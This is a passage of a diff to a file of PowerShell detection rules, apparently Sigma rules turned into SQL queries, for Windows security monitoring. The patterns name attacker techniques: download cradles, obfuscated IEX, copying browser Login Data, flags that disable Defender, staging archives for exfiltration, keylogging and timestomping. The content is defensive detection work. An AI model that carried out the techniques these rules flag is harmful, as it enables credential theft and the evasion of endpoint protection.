OR ScriptBlockText LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "posh_ps_send_mailmessage.yml" + "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" }, { - "title": "Suspicious 
PowerShell Download - Powershell Script", - "id": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", + "title": "Suspicious Get-WmiObject", + "id": "0332a266-b584-47b4-933d-a00b103e1b37", "status": "experimental", - "description": "Detects suspicious PowerShell download command", - "author": "Florian Roth (Nextron Systems)", + "description": "The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1546" ], "falsepositives": [ - "PowerShell scripts that download content from the Internet" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.DownloadFile(%' ESCAPE '\\' OR ScriptBlockText LIKE '%.DownloadString(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\') AND NOT ((Path LIKE '%\\\\CL\\_Utility.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%function Get-FreeSpace%' ESCAPE '\\' AND ScriptBlockText LIKE '%SELECT % FROM Win32\\_LogicalDisk WHERE MediaType=12%' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_download.yml" + "filename": "posh_ps_susp_gwmi.yml" }, { - "title": "Create Volume Shadow Copy with Powershell", - "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", - "status": "test", - "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", + "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script", + "id": 
"b7a3c9a3-09ea-4934-8864-6a32cacd98d9", + "status": "experimental", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Compress-Archive %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Path %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DestinationPath %' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_create_volume_shadow_copy.yml" + "filename": "posh_ps_susp_zip_compress.yml" }, { "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript", 
@@ -7998,6674 +7627,6720 @@ "filename": "posh_ps_install_unsigned_appx_packages.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", - "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", + "title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock", + "id": "1139d2e2-84b1-4226-b445-354492eba8ba", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs", + "author": "James Pemberton / @4A616D6573", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\' OR ScriptBlockText LIKE '%wget %' ESCAPE '\\' OR ScriptBlockText LIKE '%curl %' ESCAPE '\\' OR ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR ScriptBlockText LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\') AND NOT (Path LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" + "filename": "posh_ps_web_request_cmd_and_cmdlets.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell", - "id": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", + "title": "Suspicious GPO Discovery With Get-GPO", + "id": "eb2fd349-ec67-4caa-9143-d79c7fb34441", "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detect use of Get-GPO to get one 
GPO or all the GPOs in a domain.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1615" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%rundll32.exe%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ScriptBlockText LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-GPO%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_via_rundll.yml" + "filename": "posh_ps_susp_get_gpo.yml" }, { - "title": "Suspicious Unblock-File", - "id": "5947497f-1aa4-41dd-9693-c9848d58727d", + "title": "Powershell Timestomp", + "id": "c6438007-e081-42ce-9483-b067fbef33c3", "status": "test", - "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", + "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1553.005" + "attack.t1070.006" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate admin script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Unblock-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path 
%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.CreationTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastWriteTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastAccessTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetCreationTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastAccessTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastWriteTime%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_unblock_file.yml" + "filename": "posh_ps_timestomp.yml" }, { - "title": "Potential PowerShell Obfuscation Using Character Join", - "id": "e8314f79-564d-4f79-bc13-fbc0bf2660d8", + "title": "Windows Screen Capture with CopyFromScreen", + "id": "d4a11f63-2390-411c-9adf-d791fd152830", "status": "experimental", - "description": "Detects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1027", - "attack.t1059.001" + "attack.collection", + "attack.t1113" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%-Alias%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Value (-join(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%.CopyFromScreen%' ESCAPE '\\')" ], 
- "filename": "posh_ps_susp_alias_obfscuation.yml" + "filename": "posh_ps_capture_screenshots.yml" }, { - "title": "Powershell Token Obfuscation - Powershell", - "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", + "title": "Tamper Windows Defender - PSClassic", + "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027.009" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE 
'%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "posh_ps_token_obfuscation.yml" + "filename": "posh_pc_tamper_with_windows_defender.yml" }, { - "title": "Suspicious Export-PfxCertificate", - "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", + "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell", + "id": "f65e22f9-819e-4f96-9c7b-498364ae7a25", "status": "test", - "description": "Detects Commandlet that is used to 
export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", - "author": "Florian Roth (Nextron Systems)", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (HostApplication LIKE '%-ModuleName %' ESCAPE '\\' OR HostApplication LIKE '%-ModulePath %' ESCAPE '\\' OR HostApplication LIKE '%-ScriptBlock %' ESCAPE '\\' OR HostApplication LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_export_pfxcertificate.yml" + "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - PsScript", - "id": "91e69562-2426-42ce-a647-711b8152ced6", - "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. 
Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "title": "Use Get-NetTCPConnection", + "id": "b366adb4-d63d-422d-8a2c-186463b5ded0", + "status": "test", + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.reconnaissance", "attack.discovery", - "attack.credential_access", - "attack.impact" + "attack.t1049" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE 
'\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-NetTCPConnection%' ESCAPE '\\')" ], - "filename": "posh_ps_aadinternals_cmdlets_execution.yml" + "filename": "posh_pc_susp_get_nettcpconnection.yml" }, { - "title": "Access to Browser Login Data", - "id": "fc028194-969d-4122-8abe-0470d5b8f12f", + "title": "Remote PowerShell Session (PS Classic)", + "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", "status": "test", - "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", - "author": "frack113", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.credential_access", - "attack.t1555.003" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Unknown" + "Legitimate use remote PowerShell sessions" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Opera Software\\\\Opera Stable\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\Default%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data For 
Account%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" ], - "filename": "posh_ps_access_to_browser_login_data.yml" + "filename": "posh_pc_remote_powershell_session.yml" }, { - "title": "Potential Keylogger Activity", - "id": "965e2db9-eddb-4cf6-a986-7a967df651e4", - "status": "experimental", - "description": "Detects PowerShell scripts that contains reference to keystroke capturing functions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell", + "id": "71ff406e-b633-4989-96ec-bc49d825a412", + "status": "test", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ "attack.collection", - "attack.credential_access", - "attack.t1056.001" + "attack.t1074.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Compress-Archive %' ESCAPE '\\' AND HostApplication LIKE '% -Path %' ESCAPE '\\' AND HostApplication LIKE '% -DestinationPath %' ESCAPE '\\' AND HostApplication LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_keylogger_activity.yml" + "filename": "posh_pc_susp_zip_compress.yml" }, { - "title": "Execution via CL_Mutexverifiers.ps1", - "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", - "status": "test", - "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "PowerShell Downgrade 
Attack - PowerShell", + "id": "6331d09b-4785-4c13-980f-f96661356249", + "status": "experimental", + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "author": "Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND EngineVersion LIKE '2.%' ESCAPE '\\' AND NOT (HostVersion LIKE '2.%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" + "filename": "posh_pc_downgrade_attack.yml" }, { - "title": "Windows Screen Capture with CopyFromScreen", - "id": "d4a11f63-2390-411c-9adf-d791fd152830", + "title": "Suspicious XOR Encoded PowerShell Command Line - PowerShell", + "id": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", "status": "experimental", - "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", - "author": "frack113", + "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", + "author": "Teymur Kheirkhabarov, Harish Segar (rule)", "tags": [ - "attack.collection", - "attack.t1113" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND 
Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%.CopyFromScreen%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ConsoleHost' AND (HostApplication LIKE '%bxor%' ESCAPE '\\' OR HostApplication LIKE '%join%' ESCAPE '\\' OR HostApplication LIKE '%char%' ESCAPE '\\'))" ], - "filename": "posh_ps_capture_screenshots.yml" + "filename": "posh_pc_xor_commandline.yml" }, { - "title": "Import PowerShell Modules From Suspicious Directories", - "id": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", - "status": "experimental", - "description": "Detects powershell scripts that import modules from suspicious directories", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell Called from an Executable Version Mismatch", + "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "status": "test", + "description": "Detects PowerShell called from an executable by the version mismatch method", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo 
''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" ], - "filename": "posh_ps_import_module_susp_dirs.yml" + "filename": "posh_pc_exe_calling_ps.yml" }, { - "title": "Powershell Execute Batch Script", - "id": "b5522a23-82da-44e5-9c8b-e10ed8955f88", + "title": "Renamed Powershell Under Powershell Channel", + "id": "30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", "status": "test", - "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", - "author": "frack113", + "description": "Detects renamed powershell", + "author": "Harish Segar, frack113", "tags": [ "attack.execution", - "attack.t1059.003" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administration script" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.cmd%' ESCAPE '\\' OR ScriptBlockText LIKE '%.bat%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND HostName = 'ConsoleHost' AND NOT ((HostApplication LIKE 'powershell.exe%' ESCAPE '\\' OR HostApplication LIKE 'C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe%' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_execute_batch_script.yml" + "filename": "posh_pc_renamed_powershell.yml" }, { - "title": "Powershell Add Name Resolution Policy Table Rule", - "id": "4368354e-1797-463c-bc39-a309effbe8d7", + "title": "Suspicious Non PowerShell WSMAN COM Provider", + "id": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", "status": "test", - "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", - "author": "Borna Talebi", + "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", + "author": "Roberto Rodriguez (Cyb3rWard0g), 